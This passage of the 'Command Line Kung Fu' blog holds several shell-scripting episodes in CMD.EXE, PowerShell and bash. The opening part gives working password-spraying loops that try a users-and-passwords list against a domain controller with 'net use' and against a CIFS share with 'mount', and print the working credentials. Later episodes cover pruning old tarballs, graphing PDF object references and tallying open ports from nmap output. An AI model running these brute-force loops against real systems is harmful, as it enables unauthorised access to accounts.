/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL 2>&1 && @echo This works
%u/%p && @net use /delete \\DC01\IPC$ > NUL))) & set /a passcount=!passcount!+1 >NUL)
& set /a usercount=!usercount!+1 >NUL"


This works user7/Password30


There you go, brute away.

Hal is looking for a way out

The basic task of generating the username/password list is pretty easy for the Unix folks because we have the "paste" command that lets us join multiple files together in a line-by-line fashion. The only real trick here is repeating each username input four times before moving on to the next username.

The first way that occurred to me to do this is with awk:

$ paste <(awk '{print; print; print; print}' users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
...

Here I'm using the bash "<(...)" notation to include the output of our awk command as a file input for the "paste" command. The awk itself just uses multiple print statements to emit each line four times.

Really all the awk is doing for us here, however, is to act as a short-hand for a loop over our user.txt file. We could dispense with the awk an just use shell built-ins:

$ paste <(while read u; do echo -e $u\\n$u\\n$u\\n$u; done <users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
...

Aside from using a while loop instead of the awk, I'm also using a single "echo -e" statement to output all four lines, rather than calling echo multiple times. I could have done something similar with a single print statement in the awk verson, but somehow I think the "print; print; print; print" was clearer and more readable.

By the way, some of you may be wondering why I have newlines ("\n", rendered above as "\\n" to protect the backwhack from shell interpolation) after the first three $u's but not after the last one. Remember that echo will automatically output a newline at the end of the output, unless we use "echo -n".

But now that we have our username/password list, what do we do with it? Unfortunately, the SMBFS tools for Unix/Linux don't include a working equivalent for "net use". So we'd have to try mounting a share the old-fashioned way in order to test the username and password combos:

paste <(awk '{print; print; print; print}' users.txt) passwords.txt |
while read u p; do
mount -t cifs -o domain=mydomain,user=$u,password=$p \
//myshare /mnt >/dev/null 2>&1 \
&& echo $u/$p works && umount /mnt
done

If the mount command succeeds then the echo command will output the username and password. Then we'll call umount to unmount the share before moving on to the next attempt. It's kind of hideous, but it will work.

Oh well, at least it's more readable than that CMD.EXE insanity Tim threw down...

Tuesday, November 8, 2011

Episode #161: Cleaning up the Joint

Hal's got email

Apparently tired of emailing me after we post an Episode, Davide Brini decided to write us with a challenge based on a problem he had to solve recently. Davide had a directory full of software tarballs with names like:

package-foo-10006.tar.gz
package-foo-10009.tar.gz
package-foo-8899.tar.gz
package-foo-9998.tar.gz
package-bar-3235.tar.gz
package-bar-44328.tar.gz
package-bar-4433.tar.gz
package-bar-788.tar.gz

As the packages accumulate in the directory, Davide wanted to be able to get rid of everything but the most recent three tarballs. The trick is that we're only allowed to rely on the version number that's the third component of the file pathname, and not file metadata like the file timestamps. And of course our final solution should work no matter how many packages are in the directory or what their names are, and no matter how many versions of each package currently exist in the directory.

The code I used to create my test cases is actually longer than my final solution. Here's the quickie I tossed off to create a directory of interesting test files:

$ for i in one two three four five; do 
for j in {1..5}; do
touch pkg-$i-$RANDOM.tar.gz;
done;
done

$ ls
pkg-five-20690.tar.gz pkg-four-6945.tar.gz pkg-three-29078.tar.gz
pkg-five-22215.tar.gz pkg-one-16581.tar.gz pkg-three-31807.tar.gz
pkg-five-24754.tar.gz pkg-one-18962.tar.gz pkg-two-1461.tar.gz
pkg-five-27332.tar.gz pkg-one-25712.tar.gz pkg-two-14713.tar.gz
pkg-five-3200.tar.gz pkg-one-5325.tar.gz pkg-two-23569.tar.gz
pkg-four-12855.tar.gz pkg-one-8421.tar.gz pkg-two-28329.tar.gz
pkg-four-14868.tar.gz pkg-three-11196.tar.gz pkg-two-526.tar.gz
pkg-four-17282.tar.gz pkg-three-15935.tar.gz
pkg-four-19436.tar.gz pkg-three-25092.tar.gz

The outer loop creates the different package names, and the inner loop creates five instances of each package. To get a wide selection of version numbers, I just use $RANDOM to get a random value between 1 and 32K.

The tricky part about this challenge is that tools like "ls" will sort the file names alphabetically rather than numerically. In the output above, for example, you can see that "pkg-two-526.tar.gz" sorts at the very end of the list, even though numerically version number 526 is the earliest version in the "pkg-two" series of files.

We can use "sort" to list the files in numeric order by version number:

$ ls | sort -nr -t- -k3 
pkg-three-31807.tar.gz
pkg-three-29078.tar.gz
pkg-two-28329.tar.gz
pkg-five-27332.tar.gz
pkg-one-25712.tar.gz
pkg-three-25092.tar.gz
...

Here I'm doing a descending ("reversed") numeric sort ("-nr") on the third hypen-delimited field ("-t- -k3"). All the package names are mixed up, but at least the files are in numeric order.

Now all I have to do is pick out the the fourth and later copies of any particular package name. For this there's awk:

$ ls | sort -nr -t- -k3 | awk -F- '++a[$1,$2] > 3' 
pkg-five-20690.tar.gz
pkg-three-15935.tar.gz
pkg-four-12855.tar.gz
pkg-three-11196.tar.gz
pkg-one-8421.tar.gz
pkg-four-6945.tar.gz
pkg-one-5325.tar.gz
pkg-five-3200.tar.gz
pkg-two-1461.tar.gz
pkg-two-526.tar.gz

The "-F-" option tells awk to split its input on the hyphens. I'm using "++a[$1,$2]" to count the number of times I've seen a particular package name. When I get to the fourth and later entries for a given package, then my conditional statement will be true. Since I don't specify an action to take, the default assumption is "{print}" and the file name gets printed. Stick that in your awk pipe and smoke it, Davide!

Removing the files instead of just printing their names is easy. Just pipe the output into xargs:

$ ls | sort -nr -t- -k3 | awk -F- '++a[$1,$2] > 3' | xargs rm -f
$ ls
pkg-five-22215.tar.gz pkg-four-19436.tar.gz pkg-three-29078.tar.gz
pkg-five-24754.tar.gz pkg-one-16581.tar.gz pkg-three-31807.tar.gz
pkg-five-27332.tar.gz pkg-one-18962.tar.gz pkg-two-14713.tar.gz
pkg-four-14868.tar.gz pkg-one-25712.tar.gz pkg-two-23569.tar.gz
pkg-four-17282.tar.gz pkg-three-25092.tar.gz pkg-two-28329.tar.gz

I've used the "-f" option here just so that we don't get an error message when we run the command and there end up being no files that need to be removed.

And that's my final answer, Regis... er, Davide! Thanks for a fun challenge! To make things really interesting for Tim, I think we should make him do this one in CMD.EXE, don't you?

Tim thinks Hal is mean

Not only does Hal throw down the gauntlet and request CMD.EXE, but he makes this problem more difficult by making this two challenges in one. Not being one to turn down a challenge (even though I should), we start off with PowerShell by creating the test files:

PS C:\> foreach ($i in "one","two","three","four","five" ) {
foreach ($j in 1..5) {
Set-Content -Path "pkg-$i-$(Get-Random -Minimum 1 -Maximum 32000).tar.gz" -Value ""
} }


PS C:\> ls

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-five-19410.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-21426.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-26739.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-27296.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-6618.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-18533.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-25925.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-31089.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-511.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-8343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-13225.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-24343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-2835.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-308.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-4484.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-13226.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-15026.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-23830.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-30553.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-4311.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-12923.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27368.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27692.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-28727.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-3888.tar.gz


Similar to what Hal did, we use multiple loops to create the files. Set-Content is used to create the file. The filename is a little crazy as we need to use the output of Get-Random in our path. The $() is used to wrap the cmdlet and only return the output.

I feel a big like a ditch digger who is tasked with filling in the ditch he just dug, but that's the challange. We have files and some need to be deleted.

We start off grouping the files based on their package and sorting them by their version.

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]}


Count Name Group
----- ---- -----
5 four {pkg-four-31089.tar.gz, pkg-four-25925.tar.gz, pkg-four-1853...
5 three {pkg-three-30553.tar.gz, pkg-three-23830.tar.gz, pkg-three-1...
5 two {pkg-two-28727.tar.gz, pkg-two-27692.tar.gz, pkg-two-27368.t...
5 five {pkg-five-27296.tar.gz, pkg-five-26739.tar.gz, pkg-five-2142...
5 one {pkg-one-24343.tar.gz, pkg-one-13225.tar.gz, pkg-one-4484.ta...


The package and version number are retrieved by using the Split method using dots and dashes as delimiters. The version is the 3rd item (index 2, remember, base zero) and the package is the 2nd (index 1). The version is used to sort and the package name is used for grouping.

At this point we have groups that contain the files sorted, in descending order, by the version number. Now we need to get all but the first two items.

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]} | % { $_.Group[2..($_.Count)]}


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-four-18533.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-8343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-511.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-15026.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-13226.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-4311.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27368.tar.gz
...


The ForEach-Object cmdlet (alias %) is used to operate on each group. As you will remember, the items in the group are sorted in descending order by the version number. We need to select the 3rd through the last item, and this is accomplished by using the Range operator (..) with our collection of objects. The Range of 2..($_.Count) gives us everything but the first two items. Technically, I have an off-by-one issue with the upper bound, but PowerShell is kind enough not to barf on me. I did this to save a few key strokes; although, I am using a lot more key strokes to justify my laziness. Ironic? Yes.

All we have to do now is pipe it into the Remove-Item (alias del, erase, rd, ri, rm, rmdir).

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]} | % { $_.Group[2..($_.Count)]} | rm


PS C:\> ls

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-five-26739.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-27296.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-25925.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-31089.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-13225.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-24343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-23830.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-30553.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27692.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-28727.tar.gz


Not too bad, but now it is time for the sucky part.

CMD.EXE

Here is the file creator:

C:\> cmd /v:on /c "for /r %i in (pkg-one pkg-two pkg-three pkg-four pkg-five) do
@for /l %j in (1,1,5) do @echo "" > %i-!random!.tar.gz"


Similar to the previous examples, this uses two loops to write our file.

Now for the beast to nuke the old packages...

C:\> cmd /v:on /c "for /f %a in ('^(for /f "tokens=2 delims=-." %b in ^('dir /b *.*'^) do
@echo %b ^) ^| sort') do @set /a first=0 > NUL & @set /a second=0 > NUL & @(for /f "tokens=1,2,3,*
delims=-." %i in ('dir /b *.* ^| find "%a"') do @set /a v=%k > NUL & IF !v! GTR !first! (del
%i-%j-!second!.tar.gz && set /a second=!first! > NUL && set /a first=!v! > NUL) ELSE (IF !v! GTR
!second! (del %i-%j-!second!.tar.gz && set /a second=!v! > NUL) ELSE (del %i-%j-!v!.tar.gz)))"


C:\> dir
Volume in drive C has no label.
Volume Serial Number is DEAD-BEEF

Directory of C:\

11/01/2011 01:23 PM <DIR> .
11/01/2011 01:23 PM <DIR> ..
11/01/2011 01:23 PM 2 pkg-five-26739.tar.gz
11/01/2011 01:23 PM 2 pkg-five-27296.tar.gz
11/01/2011 01:23 PM 2 pkg-four-18533.tar.gz
11/01/2011 01:23 PM 2 pkg-four-8343.tar.gz
11/01/2011 01:23 PM 2 pkg-one-13225.tar.gz
11/01/2011 01:23 PM 2 pkg-one-24343.tar.gz
11/01/2011 01:23 PM 2 pkg-three-23830.tar.gz
11/01/2011 01:23 PM 2 pkg-three-30553.tar.gz
11/01/2011 01:23 PM 2 pkg-two-27692.tar.gz
11/01/2011 01:23 PM 2 pkg-two-28727.tar.gz
10 File(s) 20 bytes
2 Dir(s) 1,234,567,890 bytes free


As this command is barely decipherable, I'm not going to go through it in great detail, but I will describe it at a high level.

We start off by enabling delayed variable expansion so we can set and immediately use a variable. We then use a trusty For loop (actually, I don't trust the sneaky bastards) to find the package names. We then use another For loop to work with each file that matches the current package by using a directory listing plus the Find command. Now is where it get really hairy...

We need to keep the two files with the highest version number. To do this we use two variables, First and Second, to hold the two highest version numbers. Both variables are initialized to zero. Next we need to do some crazy comparisons.

1. If the version number of the current file for the current package is greater than First, we delete the file related to Second, move First to Second, and set First equal to the current version.

2. If the version number of the current file for the current package is less than First but greater than Second, we delete the file related to Second and set Second equal to the current version.

3. If the version number of the current file for the current package is less than both First and Second then the file is deleted.

Ok, Hal, you have your CMD.EXE. I would say "TAKE THAT", but I'm pretty sure I'm the one that was taken.

Tuesday, October 18, 2011

Episode #160: Plotting to Take Over the World

Hal's been teaching

Whew! Just got done with another week of teaching, this time at SANS Baltimore. I even got a chance to give my "Return of Command Line Kung Fu" talk, so I got a bunch of shell questions.

One of my students had a very interesting challenge. To help analyze malicious PDF documents, he was trying to parse the output of Didier Stevens' pdf-parser.py and create an input file for GNUplot that would show a graph of the object references in the document. Here's a sample of the kind of output we're dealing with:

$ pdf-parser.py CLKF.pdf
PDF Comment '%PDF-1.3\n'

PDF Comment '%\xc7\xec\x8f\xa2\n'

obj 5 0
Type:
Referencing: 6 0 R
Contains stream
[(1, '\n'), (2, '<<'), (2, '/Length'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (2, '>>'), (1, '\n')]

<<
/Length 6 0 R
/Filter /FlateDecode
>>


obj 6 0
Type:
Referencing:
[(1, '\n'), (3, '678'), (1, '\n')]
...


obj 4 0
Type: /Page
Referencing: 3 0 R, 11 0 R, 12 0 R, 13 0 R, 5 0 R
...

The lines like "obj 5 0" give the object number and version of a particular object in the PDF. The "Referencing" lines below show the objects referenced. A given object can reference any number of objects from zero to many.

To make the chart with GNUplot, we need to create an input file that shows "obj -> ref;" for all references. So for object #5, we'd have one line of output that shows "5 -> 6;". There would be no output for object #6, since it references zero objects. And we'd get 5 lines of output for object #4, "4 -> 3;", "4 -> 11;", and so on.

This seems like a job for awk. Frankly, I thought about just calling Davide Brini and letting him write this week's Episode, but he's already getting too big for his britches. So here's my poor, fumbling attempt:

$ pdf-parser.py CLKF.pdf |
awk '/^obj/ { objnum = $2 };
/Referencing: [0-9]/ \
{ max = split($0, a);
for (i = 2; i < max; i += 3) { print objnum" -> "a[i]";" }
}'

5 -> 6;
...
4 -> 3;
4 -> 11;
4 -> 12;
4 -> 13;
4 -> 5;
...

The first line of awk matches the "obj" lines and puts the object number into the variable "objnum". The second awk expression matches the "Referencing" lines, but notice that I added a "[0-9]" at the end of the pattern match so that I only bother with lines that actually include referenced objects.

When we hit a line like that, then we do the stuff in the curly braces. split() breaks our input line, aka "$0", on white space and puts the various fields into an array called "a". split() also returns the number of elements in the array, which we put into a variable called "max". Then I have a for loop that goes through the array, starting with the second element-- this is the actual object number that follows "Referencing:". Notice the loop update code is "i += 3", which allows me to just access the object number elements and skip over the other crufty stuff I don't care about. Inside the loop we just print out the object number and current array element with the appropriate punctuation for GNUplot.

Meh. It's a little scripty, I must confess. Mostly because of the for loop inside of the awk statement to iterate over the references. But it gets the job done, and I really did compose this on the command line rather than in a script file.

Let's see if Tim's plotting involves a trip to Scriptistan as well...

Tim's traveling

While I have been out of the country for a few weeks, I didn't have to visit Scriptistan to get my fu for this week. The PowerShell portion is a bit long, but I wouldn't classify it as a script even though it has a semicolon in it. We do have lots of ForEach-Object cmdlets, Select-String cmdlets, and Regular Expressions. And you know what they say about Regular Expressions: Much like violence, if Regular Expressions aren't working, you aren't using enough of it.

Instead of starting off with some ultraviolent fu, let's build up to that before we wield the energy to destroy medium-large buildings. First, let's find the object number and its references.

PS C:\> C:\Python25\python.exe pdf-parser.py CLKF.pdf |
Select-String -Pattern "(?<=^obj\s)\d+" -Context 0,2


> obj 5 0
Type:
Referencing: 6 0 R
> obj 6 0
Type:
Referencing:
> obj 15 0
Type:
Referencing: 16 0 R
...
> obj 4 0
Type: /Page
Referencing: 3 0 R, 11 0 R, 12 0 R, 13 0 R, 5 0 R


The output of pdf-parser.py is piped into the Select-String cmdlet which finds lines that start with "obj", are followed by a space (\s), then one or more digits (\d+). The Context switch is used to get the next two lines so we can later use the "Referencing" portion.

You might also notice our regular expression uses a "positive look behind", meaning that it needs to see "obj " before the number we want. This way we end up with just the object number being selected and not the useless text in front of it. This is demonstrated by Matches object shown below.

PS C:\> C:\Python25\python.exe pdf-parser.py CLKF.pdf |
Select-String -Pattern "(?<=^obj\s)[0-9]+" -Context 0,2 | Format-List


IgnoreCase : True
LineNumber : 7
Line : obj 5 0
Filename : InputStream
Path : InputStream
Pattern : (?<=^obj\s)[0-9]+
Context : Microsoft.PowerShell.Commands.MatchInfoContext
Matches : {5}
...


To parse the Referencing line we need we need to use some more violence regular expressions on the Context object. First, let's see what the Context object looks like. To do this we previous command into the command below to see the available properties.

PS C:\> ... | Select-Object -ExcludeProperty Context | Get-Member

TypeName: Microsoft.PowerShell.Commands.MatchInfoContext

Name MemberType Definition
---- ---------- ----------
Clone Method System.Object Clone()
Equals Method bool Equals(System.Object obj)
GetHashCode Method int GetHashCode()
GetType Method type GetType()
ToString Method string ToString()
DisplayPostContext Property System.String[] DisplayPostContext {get;set;}
DisplayPreContext Property System.String[] DisplayPreContext {get;set;}
PostContext Property System.String[] PostContext {get;set;}
PreContext Property System.String[] PreContext {get;set;}


The PostContext property contains the two lines that followed our initial match. We can access the second line by access the row with an index of 1 (remember, base zero, so 1=2).

PS C:\> C:\Python25\python.exe pdf-parser.py CLKF.pdf |
Select-String -Pattern "(?<=^obj\s)[0-9]+" -Context 0,2 |
ForEach-Object { $objnum = $_.matches[0].Value; $_.Context.PostContext[1] }


Referencing: 6 0 R
Referencing:
Referencing: 16 0 R
Referencing:
Referencing: 25 0 R
...


The above command saves the current object number in $objnum and then outputs the second line of the PostContext.

Finally, we need to parse the Context with ultra violence more regular expressions and display our output.

PS C:\> C:\Python25\python.exe pdf-parser.py CLKF.pdf |
Select-String -Pattern "(?<=^obj\s)[0-9]+" -Context 0,2 |
% { $objnum = $_.matches[0].Value; $_.Context.PostContext[1] |
Select-String "(\d+(?=\s0\sR))" -AllMatches | Select-Object -ExpandProperty matches |
ForEach-Object { "$($objnum)->$($_.Value)" } }


5 -> 6;
...
4 -> 3;
4 -> 11;
4 -> 12;
4 -> 13;
4 -> 5;
...


The second line of PostContect, the Referencing line, is piped into the Select-String cmdlet where we use our regular expression to look for the a number followed by "<space>0<space>R". The AllMatches switch is used to find all the objects referenced. We then Expand the matches property so we can work with each match inside our ForEach-Object cmdlet where we output the original object number and the found reference.

Tuesday, October 4, 2011

Episode #159: Portalogical Exam

Tim finally has an idea

Sadly, we've been away for two weeks due to lack of new, original ideas for posts. BUT! I came up with and idea. Yep, all by myself too. (By the way, if you have an idea for an episode send it in)

During my day job pen testing, I regularly look at nmap results to see what services are available. I like to get a high level look at the open ports. For example, lots of tcp/445 means a bunch of Windows boxes. It is also useful to quickly see the one off ports, and in this line of work, the one offs can be quite important. One unique service may be legacy, special (a.k.a. not patched), or forgotten.

Nmap has a number of output options: XML, grep'able output, and standard nmap output. PowerShell really favors objects, which means that XML will work great. So let's start off by reading the file and parsing it as XML.

PS C:\> [xml](Get-Content nmap.xml)

xml xml-stylesheet #comment nmaprun
--- -------------- -------- -------
version="1.0" href="file:///usr/local/sh... Nmap 5.51 scan initiated ... nmaprun


Get-Content (alias gc, cat, type) is used to read the file, then [xml] parses it and converts it to an XML object. After we have an XML object, we can see all the nodes of the document. To access each node we access it like any property:

PS C:\> ([xml](gc nmap.xml)).nmaprun.host


But each host has a ports property that needs to be expanded, and each ports property has multiple port properties to be expanded. To do this we use a pair of Select-Object cmdlets with the -ExpandProperty switch (-ex for short).

PS C:\> ([xml](gc .nmap.xml)).nmaprun.host | select -expand ports | 
select -ExpandProperty port


protocol portid state service
-------- ------ ----- -------
tcp 22 state service
tcp 23 state service
tcp 80 state service
tcp 443 state service
tcp 80 state service
tcp 443 state service
...


Nmap can have information on closed ports, so I like to make sure that I am only looking at open ports. We use the Where-Object cmdlet (alias ?) to filter for ports that are open. Each port has a state element and a state property, and we'll check if the state of the state (yep, that's right) is open:

PS C> ... | ? { $_.state.state -eq "open" }


The output is the same, just with extra filtering. Now all we need to do is count. To do that, we use the Group-Object cmdlet (alias group).

PS C:\> ([xml](gc nmap.xml)).nmaprun.host | select -expand ports | 
select -ExpandProperty port | ? { $_.state.state -eq "open" } |
group protocol,portid -NoElement


Count Name
----- ----
12 tcp, 80
1 tcp, 25
12 tcp, 443
2 tcp, 53
...


The -NoElement switch tells the cmdlet to discard the individual objects and just give us the group information.

Of course, if we are looking for patterns or one off ports we need use the Sort-Object cmdlet (alias sort) by the Count and use the -Descending switch (-desc for short)..

PS C:\> ([xml](gc nmap.xml)).nmaprun.host | select -expand ports | 
select -ExpandProperty port | ? { $_.state.state -eq "open" } |
group protocol,portid -NoElement | sort count -desc


Count Name
----- ----
12 tcp, 443
12 tcp, 80
2 tcp, 53
2 tcp, 18264
...



Now that's handy, but many times I have multiple scans, like a UDP scan and a TCP scan. If we want to combine multiple scans into one table we can do it relatively easily.

PS C:\> ls *.xml | % { ([xml](gc $_)).nmaprun.host } | select -expand ports |
select -ExpandProperty port | ? { $_.state.state -eq "open" } |
group protocol,portid -NoElement | sort count -desc


Count Name
----- ----
12 tcp, 443
12 tcp, 80
3 udp, 161
2 tcp, 53
2 tcp, 18264
...


The beauty of PowerShell's pipeline is that we can use any method we want to pick the files, then feed them into the next command with a ForEach-Object loop (alias %).

Now that I've checked all my ports, it's time for Hal to get his checked.

Hal examines his options

Tim, when you get to be my age, you'll get all of your ports checked on an annual basis.

Now let's examine this so-called idea of Tim's. Oh sure, XML is all fine and dandy for fancy scripting languages like Powershell. But you'll notice he didn't even attempt to do this in CMD.EXE. Weakling.

While XML is generally a multi-line format and not typically conducive to shell utilities that operate on a "line at a time" basis, for something simple like this we can easily hack together some code. In the XML format, the lines that show open ports have a regular format:

<port protocol="tcp" portid="443"><state state="open" />...</port>

So pardon me while I throw down some sed:

$ sed 's/^<port protocol="\([^"]*\)" portid="\([^"]*\)"><state state="open".*/\2\/\1/; 
t p; d; :p' test.xml | sort | uniq -c | sort -nr -k1 -k2

6 443/tcp
5 80/tcp
3 22/tcp
2 3306/tcp
1 9100/tcp
...

The first part of the sed expression is a substitution that matches the protocol name and port number and replaces the entire line with just "<port>/<protocol>". Now I only want to output the lines where this substitution succeeded, so I use "t p" to branch to the label ":p" whenever the substitution happens. If we don't branch, then we hit the "d" command to drop the pattern space without printing and move onto the next line. Since the ":p" label we jump to on a successful substitution is an empty block, sed just prints the pattern space and moves onto the next line. This is a useful sed idiom for only printing our matching lines.

The rest of the pipeline puts the output lines from sed into sorted order so we can feed them into "uniq -c" to count the occurrences of each line. After that we use sort again to do a descending numeric sort ("-nr") of first the counts ("-k1") and then the port numbers ("-k2"). And that give us the output we want.

I actually find the so-called "grep-able" output format of Nmap kind of a pain to deal with for this kind of thing. That's because Nmap insists on jamming all of the port information together into delimited, but variable length lines like this:

Host: 192.168.1.2 (test.deer-run.com) Ports: 22/open/tcp//ssh///, 
25/open/tcp//smtp///, 53/open/tcp//domain///, 80/open/tcp//http///,
139/open/tcp//netbios-ssn///, 143/open/tcp//imap///, 443/open/tcp//https///,
445/open/tcp//microsoft-ds///, 514/open/tcp//shell///, 587/open/tcp//submission///,
601/open/tcp/////, 902/open/tcp//iss-realsecure-sensor///, 993/open/tcp//imaps///,
1723/open/tcp//pptp///, 8009/open/tcp//ajp13/// Seq Index: 3221019...

So to handle this problem, I'm just going to use tr to convert the spaces to newlines, forcing the output to have a single port entry per line. After that, it's just awk:

$ cat test.gnmap | tr ' ' \\n | awk -F/ '/\/\/\// {print $1 "/" $3}' | 
sort | uniq -c | sort -nr -k1 -k2

6 443/tcp
5 80/tcp
3 22/tcp
2 3306/tcp
1 9100/tcp
...

The port listings all end with "///", so I use awk to match those lines and output the port and protocol fields. Notice the "-F/" option so that awk uses the slash character as the field delimiter instead of whitespace. After that it's the same "sort ... | uniq -c | sort ..." pipeline we used in the last case to format the output.

The easiest case is actually the regular Nmap output:

$ awk '/^[0-9]/ {print $1}' test.nmap | sort | uniq -c | sort -nr -k1 -k2
6 443/tcp
5 80/tcp
3 22/tcp
2 3306/tcp
1 9100/tcp
...

The lines about open ports are the only ones in the output that start with digits. So it's a quick awk expression to match these lines and output the port specifier. After that, we use the same pipeline we used in the previous examples to format the output appropriately.

So, Tim, my shell may not have built-in tools to parse XML but it's apparently three times the shell that yours is. Stick that in your port and smoke it.

Because Davide sed So

Proving he's not just a whiz at awk, Davide Brini wrote in with a more elegant sed idiom for just printing the lines that match our substitution:

$ sed -n 's/^<port protocol="\([^"]*\)" portid="\([^"]*\)"><state state="open".*/\2\/\1/p' test.xml | 
sort | uniq -c | sort -nr -k1 -k2

6 443/tcp
5 80/tcp
3 22/tcp
2 3306/tcp
1 9100/tcp
...

"sed -n ..." suppresses the normal sed output and "s/.../.../p" causes the lines that match our substitution to be printed out. And that's much easier. Thanks, Davide!